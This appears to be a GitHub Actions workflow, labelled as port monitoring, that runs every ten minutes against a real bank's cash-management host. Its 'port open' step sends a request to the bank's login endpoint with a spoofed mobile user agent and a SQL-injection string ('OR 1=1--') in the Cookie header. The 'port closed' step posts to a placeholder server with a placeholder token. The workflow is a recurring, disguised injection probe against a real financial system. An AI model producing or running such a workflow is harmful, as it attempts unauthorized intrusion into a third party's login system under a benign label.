name: Monitoreo de Puerto

on:
  schedule:
    - cron: "*/10 * * * *"  # cada 10 minutos
  workflow_dispatch:

jobs:
  check-port:
    runs-on: ubuntu-latest
    steps:
      - name: Verificar puerto con nc
        id: checkport
        run: |
          HOST="cashmanagement.pichincha.com"
          PORT=443
          if nc -zv $HOST $PORT; then
            echo "status=abierto" >> $GITHUB_OUTPUT
            echo "Puerto $PORT en $HOST está ABIERTO ✅"
          else
            echo "status=cerrado" >> $GITHUB_OUTPUT
            echo "Puerto $PORT en $HOST está CERRADO ❌"
            exit 1
          fi

      - name: Enviar reporte POST si puerto está cerrado
        if: steps.checkport.outputs.status == 'cerrado'
        run: |
          curl -X POST "https://api.tuservidor.com/reporte?puerto=443&host=example.com" \
            -H "Authorization: Bearer tu_token_aqui" \
            -H "Content-Type: application/json" \
            -d '{"mensaje":"Puerto cerrado detectado en monitor"}'

      - name: Enviar reporte POST si puerto está abierto
        if: steps.checkport.outputs.status == 'abierto'
        run: |
          curl -A "Mozilla/5.0 (Linux; Android 10; SM-G996U Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Mobile Safari/537.36" -X GET "https://cashmanagement.pichincha.com/loginNR/" \
            -H "Cookie: OR 1=1--" \
            -d '{"q":"data"}'
